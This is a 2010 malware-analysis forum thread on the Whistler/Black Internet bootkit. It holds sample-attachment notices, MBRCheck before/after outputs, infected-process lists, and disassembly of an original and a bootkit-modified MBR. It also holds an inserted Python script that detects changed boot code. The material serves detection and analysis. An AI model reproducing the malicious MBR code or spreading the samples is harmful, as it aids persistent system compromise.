A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1513  by a_d_13
 Wed Jul 14, 2010 3:22 pm
Hello,

Here is a possible dropper of Whistler bootkit, courtesy of sUBs. I haven't tested it, so if you do, please post results here.

Thanks,
--AD
Attachments
Pass: infected
(1003.2 KiB) Downloaded 99 times
 #1522  by Elite
 Wed Jul 14, 2010 9:25 pm
Didn't open in IDA or step through with Olly, but no MBR modifications visible with the tool I used to check.

Of course, I can always cross check offline if requested with something else.
VM detection? Maybe.

Also, some weird usermode hooks inside IE after executing sample, referencing some strange but MS-looking DLL. IE is running in the background doing something after rebooting.
 #1525  by Quads
 Wed Jul 14, 2010 11:06 pm
Checked MBR before running file

\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
    149 GB  \\.\PhysicalDrive0   Windows XP MBR code detected

Done! Press ENTER to exit...

Ran the file after

Processes
C:\Program Files\Internet Explorer\iexplore.exe used not by me
C:\DOCUME~1\John\LOCALS~1\Temp\loader.exe
C:\DOCUME~1\John\LOCALS~1\Temp\smss.exe

possibly entry added HKUS\S-1-5-21-484763869-1275210071-1644491937-1003\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User '?')


MBR
\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
    149 GB  \\.\PhysicalDrive0   Unknown MBR code

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:

Options:
[1] Dump the MBR of a physical disk to file.
[2] Restore the MBR of a physical disk with a standard boot code.
[3] Exit.

Enter your choice: Enter the physical disk number to fix (0-99, -1 to cancel):

Available MBR codes:
[ 0] Default (Windows XP)
[ 1] Windows XP
[ 2] Windows Server 2003
[ 3] Windows Vista
[ 4] Windows 2008
[ 5] Windows 7
[-1] Cancel

Please select the MBR code to write to this drive:
Do you want to fix the MBR code? Type 'YES' and hit ENTER to continue: Successfully wrote new MBR code!

Done! Press ENTER to exit...


After that I double checked

\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
    149 GB  \\.\PhysicalDrive0   Windows XP MBR code detected

Done! Press ENTER to exit...


Quads
 #1526  by chemist
 Wed Jul 14, 2010 11:21 pm
I was not able to infect vm at all, with any installer. Was able to infect my test machine with sUBs sample:
MBRCheck, version 1.1.0
(c) 2010, AD
\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
     74 GB  \\.\PhysicalDrive0   Known-bad MBR code detected (Whistler / Black Internet)!

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:
RKU showed Possible Rootkit Activity Detected. No signs in DDS.txt.
 #1529  by Quads
 Wed Jul 14, 2010 11:34 pm
chemist wrote: I was not able to infect vm at all, with any installer. Was able to infect my test machine with sUBs sample:
MBRCheck, version 1.1.0
(c) 2010, AD
\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
     74 GB  \\.\PhysicalDrive0   Known-bad MBR code detected (Whistler / Black Internet)!

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:
RKU showed Possible Rootkit Activity Detected. No signs in DDS.txt.
Where do I get the newer version of MBRCheck? Please.

Edit: just found it to download.

Quads
 #1534  by EP_X0FF
 Thu Jul 15, 2010 4:31 am
Yes, it works fine on a VM, try the latest VirtualBox. And yes, this is BlackInternet.

MBR modification detected, no stealth defense detected (sorry for the ugly format, posted directly from the viewer).
Malicious smss.exe and loader.exe present :)

Original MBR

00000000: 33C0            xor ax, ax
00000002: 8ED0            mov ss, ax
00000004: BC007C          mov sp, 7C00h
00000007: FB              sti
00000008: 50              push ax
00000009: 07              pop es
0000000A: 50              push ax
0000000B: 1F              pop ds
0000000C: FC              cld
0000000D: BE1B7C          mov si, 7C1Bh
00000010: BF1B06          mov di, 061Bh
00000013: 50              push ax
00000014: 57              push di
00000015: B9E501          mov cx, 01E5h
00000018: F3A4            rep movsb
0000001A: CB              retf
0000001B: BDBE07          mov bp, 07BEh
0000001E: B104            mov cl, 04h
00000020: 386E00          cmp [bp], ch
00000023: 7C09            jl 2Eh
00000025: 7513            jnz 3Ah
00000027: 83C510          add bp, 0010h
0000002A: E2F4            loop 20h
0000002C: CD18            int 18h
0000002E: 8BF5            mov si, bp
00000030: 83C610          add si, 0010h
00000033: 49              dec cx
00000034: 7419            jz 4Fh
00000036: 382C            cmp [si], ch
00000038: 74F6            jz 30h
0000003A: A0B507          mov al, [7B5h]
0000003D: B407            mov ah, 07h
0000003F: 8BF0            mov si, ax
00000041: AC              lodsb
00000042: 3C00            cmp al, 00h
00000044: 74FC            jz 42h
00000046: BB0700          mov bx, 0007h
00000049: B40E            mov ah, 0Eh
0000004B: CD10            int 10h
0000004D: EBF2            jmp 41h
0000004F: 884E10          mov [bp+10h], cl
00000052: E84600          call 009Bh
00000055: 732A            jnb 81h
00000057: FE4610          inc byte ptr [bp+10h]
0000005A: 807E040B        cmp byte ptr [bp+04h], 0Bh
0000005E: 740B            jz 6Bh
00000060: 807E040C        cmp byte ptr [bp+04h], 0Ch
00000064: 7405            jz 6Bh
00000066: A0B607          mov al, [7B6h]
00000069: 75D2            jnz 3Dh
0000006B: 80460206        add byte ptr [bp+02h], 06h
0000006F: 83460806        add [bp+08h], 0006h
00000073: 83560A00        adc [bp+0Ah], 0000h
00000077: E82100          call 009Bh
0000007A: 7305            jnb 81h
0000007C: A0B607          mov al, [7B6h]
0000007F: EBBC            jmp 3Dh
00000081: 813EFE7D55AA    cmp [7DFEh], AA55h
00000087: 740B            jz 94h
00000089: 807E1000        cmp byte ptr [bp+10h], 00h
0000008D: 74C8            jz 57h
0000008F: A0B707          mov al, [7B7h]
00000092: EBA9            jmp 3Dh
00000094: 8BFC            mov di, sp
00000096: 1E              push ds
00000097: 57              push di
00000098: 8BF5            mov si, bp
0000009A: CB              retf
0000009B: BF0500          mov di, 0005h
0000009E: 8A5600          mov dl, [bp]
000000A1: B408            mov ah, 08h
000000A3: CD13            int 13h
000000A5: 7223            jb CAh
000000A7: 8AC1            mov al, cl
000000A9: 243F            and al, 3Fh
000000AB: 98              cbw
000000AC: 8ADE            mov bl, dh
000000AE: 8AFC            mov bh, ah
000000B0: 43              inc bx
000000B1: F7E3            mul bx
000000B3: 8BD1            mov dx, cx
000000B5: 86D6            xchg dl, dh
000000B7: B106            mov cl, 06h
000000B9: D2EE            shr dh, cl
000000BB: 42              inc dx
000000BC: F7E2            mul dx
000000BE: 39560A          cmp [bp+0Ah], dx
000000C1: 7723            jnbe E6h
000000C3: 7205            jb CAh
000000C5: 394608          cmp [bp+08h], ax
000000C8: 731C            jnb E6h
000000CA: B80102          mov ax, 0201h
000000CD: BB007C          mov bx, 7C00h
000000D0: 8B4E02          mov cx, [bp+02h]
000000D3: 8B5600          mov dx, [bp]
000000D6: CD13            int 13h
000000D8: 7351            jnb 12Bh
000000DA: 4F              dec di
000000DB: 744E            jz 12Bh
000000DD: 32E4            xor ah, ah
000000DF: 8A5600          mov dl, [bp]
000000E2: CD13            int 13h
000000E4: EBE4            jmp CAh
000000E6: 8A5600          mov dl, [bp]
000000E9: 60              pusha
000000EA: BBAA55          mov bx, 55AAh
000000ED: B441            mov ah, 41h
000000EF: CD13            int 13h
000000F1: 7236            jb 129h
000000F3: 81FB55AA        cmp bx, AA55h
000000F7: 7530            jnz 129h
000000F9: F6C101          test cl, 01h
000000FC: 742B            jz 129h
000000FE: 61              popa
000000FF: 60              pusha
00000100: 6A00            push 0000h
00000102: 6A00            push 0000h
00000104: FF760A          push [bp+0Ah]
00000107: FF7608          push [bp+08h]
0000010A: 6A00            push 0000h
0000010C: 68007C          push 7C00h
0000010F: 6A01            push 0001h
00000111: 6A10            push 0010h
00000113: B442            mov ah, 42h
00000115: 8BF4            mov si, sp
00000117: CD13            int 13h
00000119: 61              popa
0000011A: 61              popa
0000011B: 730E            jnb 12Bh
0000011D: 4F              dec di
0000011E: 740B            jz 12Bh
00000120: 32E4            xor ah, ah
00000122: 8A5600          mov dl, [bp]
00000125: CD13            int 13h
00000127: EBD6            jmp FFh
00000129: 61              popa
0000012A: F9              stc
0000012B: C3              ret
New modified MBR

00000000: 31C0            xor ax, ax
00000002: 8ED8            mov ds, ax
00000004: 8EC0            mov es, ax
00000006: 8ED0            mov ss, ax
00000008: BC007C          mov sp, 7C00h
0000000B: BE007C          mov si, 7C00h
0000000E: BF0006          mov di, 0600h
00000011: B98000          mov cx, 0080h
00000014: 6650            push eax
00000016: 66B837030000    mov eax, 00000337h
0000001C: 6658            pop eax
0000001E: FC              cld
0000001F: F366A5          rep movsw
00000022: EA270600006631  jmp far 3166:00000627h
00000029: C0BEBE07B1      sar byte ptr [bp+07BEh], B1h
0000002E: 0466            add al, 66h
00000030: 87D9            xchg bx, cx
00000032: 6687CB          xchg ecx, ebx
00000035: 66394408        cmp [si+08h], eax
00000039: 7208            jb 43h
0000003B: 668B4408        mov eax, [si+08h]
0000003F: 6603440C        add eax, [si+0Ch]
00000043: 83C610          add si, 0010h
00000046: E2ED            loop 35h
00000048: 6609C0          or eax, eax
0000004B: 7418            jz 65h
0000004D: 6683C002        add eax, 00000002h
00000051: B94000          mov cx, 0040h
00000054: BB007C          mov bx, 7C00h
00000057: E84F00          call 00A9h
0000005A: 7209            jb 65h
0000005C: 6656            push esi
0000005E: 665E            pop esi
00000060: EA007C0000BEBE  jmp far BEBE:00007C00h
00000067: 07              pop es
00000068: B104            mov cl, 04h
0000006A: 803C80          cmp byte ptr [si], FFFFFF80h
0000006D: 740F            jz 7Eh
0000006F: 382C            cmp [si], ch
00000071: 0F858300        jnz 00F8h
00000075: 83C610          add si, 0010h
00000078: E2F0            loop 6Ah
0000007A: 90              nop
0000007B: 90              nop
0000007C: CD18            int 18h
0000007E: 668B4408        mov eax, [si+08h]
00000082: 89E3            mov bx, sp
00000084: B90100          mov cx, 0001h
00000087: E81F00          call 00A9h
0000008A: 730A            jnb 96h
0000008C: 8B4C02          mov cx, [si+02h]
0000008F: B80102          mov ax, 0201h
00000092: CD13            int 13h
00000094: 727D            jb 113h
00000096: 813EFE7D55AA    cmp [7DFEh], AA55h
0000009C: 0F859500        jnz 0135h
000000A0: 6656            push esi
000000A2: 665E            pop esi
000000A4: EA007C00006660  jmp far 6066:00007C00h
000000AB: BBAA55          mov bx, 55AAh
000000AE: B441            mov ah, 41h
000000B0: CD13            int 13h
000000B2: 7304            jnb B8h
000000B4: F9              stc
000000B5: 6661            popa
000000B7: C3              ret
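The before/after MBRCheck runs earlier in the thread (dump a baseline, re-read the sector after running the sample, compare) and the partition-table walk visible at offsets 35h..46h of the modified MBR above boil down to a small amount of parsing. The script below is an added example, not MBRCheck's code or anything from the thread's attachments: it builds two constructed 512-byte sectors whose boot code begins with the opcode bytes of the first instructions in the two listings (the rest of each boot-code area is zero-filled and the partition geometry is made up for the test), then reports signature validity, a boot-code status in MBRCheck's style, a byte diff against the baseline, and the end-of-last-partition LBA that the modified MBR computes before reading 40h sectors from two sectors past it.

```python
"""MBR baseline-and-compare check (added example, not MBRCheck's code).

The boot-code prefixes are the opcode bytes of the first instructions of the
"Original MBR" and "New modified MBR" listings in this thread; everything else
in the two constructed sectors is filler and NOT a copy of the real sectors."""
import struct
from dataclasses import dataclass
from typing import List

SECTOR_SIZE = 512
BOOT_CODE_SIZE = 446            # bytes 0..445 hold the boot code
PART_TABLE_OFF = 446            # four 16-byte partition entries follow
MBR_SIGNATURE = b"\x55\xAA"     # the AA55h both listings test at 7DFEh

# Opcodes of the first 16 instructions of "Original MBR" (offsets 00h..1Ah).
XP_BOOT_PREFIX = bytes.fromhex(
    "33C08ED0BC007CFB5007501FFCBE1B7CBF1B065057B9E501F3A4CB")
# Opcodes of the first 12 instructions of "New modified MBR" (offsets 00h..1Eh).
BOOTKIT_BOOT_PREFIX = bytes.fromhex(
    "31C08ED88EC08ED0BC007CBE007CBF0006B98000665066B8370300006658FC")


@dataclass
class Partition:
    status: int          # 80h = active; the original MBR scans for this byte
    ptype: int
    start_lba: int
    sectors: int

    @property
    def end_lba(self) -> int:
        """First LBA after the partition: start + size, as the modified MBR sums it."""
        return self.start_lba + self.sectors


def build_mbr(boot_prefix: bytes, partitions: List[Partition]) -> bytes:
    """Constructed sector: prefix zero-filled to 446 bytes, partition table, signature."""
    code = boot_prefix.ljust(BOOT_CODE_SIZE, b"\x00")
    table = b"".join(
        struct.pack("<B3sB3sII", p.status, b"\0\0\0", p.ptype, b"\0\0\0",
                    p.start_lba, p.sectors)
        for p in partitions).ljust(64, b"\x00")
    return code + table + MBR_SIGNATURE


def has_valid_signature(mbr: bytes) -> bool:
    return len(mbr) == SECTOR_SIZE and mbr[510:512] == MBR_SIGNATURE


def parse_partitions(mbr: bytes) -> List[Partition]:
    """Walk the four entries; CHS fields are skipped (3x), LBA fields are little-endian."""
    parts = []
    for i in range(4):
        status, ptype, start, size = struct.unpack_from(
            "<B3xB3xII", mbr, PART_TABLE_OFF + 16 * i)
        if ptype != 0 and size != 0:
            parts.append(Partition(status, ptype, start, size))
    return parts


def classify_boot_code(mbr: bytes) -> str:
    """Rough equivalent of MBRCheck's status column.  Prefix matching is only a
    demonstration; a real tool hashes the whole 446-byte boot-code area."""
    if mbr.startswith(XP_BOOT_PREFIX):
        return "Windows XP MBR code detected"
    if mbr.startswith(BOOTKIT_BOOT_PREFIX):
        return "Known-bad MBR code detected (Whistler / Black Internet)!"
    return "Unknown MBR code"


def boot_code_diff(baseline: bytes, current: bytes) -> List[int]:
    """Offsets in the boot-code area that changed since the baseline dump."""
    return [i for i in range(BOOT_CODE_SIZE) if baseline[i] != current[i]]


def end_of_last_partition(parts: List[Partition]) -> int:
    """What the loop at 35h..46h of the modified MBR computes: the end LBA of the
    partition with the highest start.  The listing then reads 40h sectors from
    two sectors past this value, so that unallocated tail is what to image."""
    if not parts:
        return 0
    return max(parts, key=lambda p: p.start_lba).end_lba


def check_mbr(baseline: bytes, current: bytes) -> dict:
    """One MBRCheck-style pass over a freshly read sector against the baseline."""
    return {
        "signature_ok": has_valid_signature(current),
        "status": classify_boot_code(current),
        "boot_code_changed": bool(boot_code_diff(baseline, current)),
        "partition_table_changed":
            current[PART_TABLE_OFF:510] != baseline[PART_TABLE_OFF:510],
        "end_of_last_partition": end_of_last_partition(parse_partitions(current)),
    }


# Constructed "before" and "after" sectors: one active NTFS partition at LBA 63.
PARTS = [Partition(status=0x80, ptype=0x07, start_lba=63, sectors=312_000_000)]
BASELINE_MBR = build_mbr(XP_BOOT_PREFIX, PARTS)
INFECTED_MBR = build_mbr(BOOTKIT_BOOT_PREFIX, PARTS)

if __name__ == "__main__":
    for label, mbr in (("before", BASELINE_MBR), ("after", INFECTED_MBR)):
        print(label, check_mbr(BASELINE_MBR, mbr))
```

On a live system the two sectors would come from reading the first 512 bytes of \\.\PhysicalDrive0 before and after the test run, which is exactly the "dump the MBR to file" baseline MBRCheck offers; the partition table is unchanged in the infected case, which is why a table-only comparison misses this family and the boot-code bytes themselves have to be compared.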
 #1537  by Elite
 Thu Jul 15, 2010 7:45 am
MBRCheck, version 1.1.0
(c) 2010, AD

\\.\C: --> \\.\PhysicalDrive0

      Size  Device Name          MBR Status
  --------------------------------------------
     10 GB  \\.\PhysicalDrive0   Known-bad MBR code detected (Whistler / Black Internet)!

Found non-standard or infected MBR.
Enter 'Y' and hit ENTER for more options, or 'N' to exit:

Options:
  [1] Dump the MBR of a physical disk to file.
  [2] Restore the MBR of a physical disk with a standard boot code.
  [3] Exit.

Enter your choice:

Done!  Press ENTER to exit...
Whooops. Looks like it worked after all.
 #1581  by a_d_13
 Sat Jul 17, 2010 9:41 pm
Hello,

Has anyone got a Rootkit Unhooker or GMER log from a computer infected with this bootkit? If so, can you please upload it for reference? Or, if you have an infected VM, please get a log and post it.

Thanks,
--AD
 #1586  by EP_X0FF
 Sun Jul 18, 2010 4:49 am
In the attachment: exe, BlackInternet File Loader dll, BlackInternet driver from the infected machine.
Attachments
pass: malware
(49.33 KiB) Downloaded 69 times
 #1604  by Quads
 Sun Jul 18, 2010 10:32 pm
a_d_13 wrote:Hello,

Has anyone got a Rootkit Unhooker or GMER log from a computer infected with this bootkit? If so, can you please upload it for reference? Or, if you have an infected VM, please get a log and post it.

Thanks,
--AD
See attached log. Oh, and I didn't have IE open during scanning with GMER; I hardly use IE.

Quads
Attachments
(7.38 KiB) Downloaded 59 times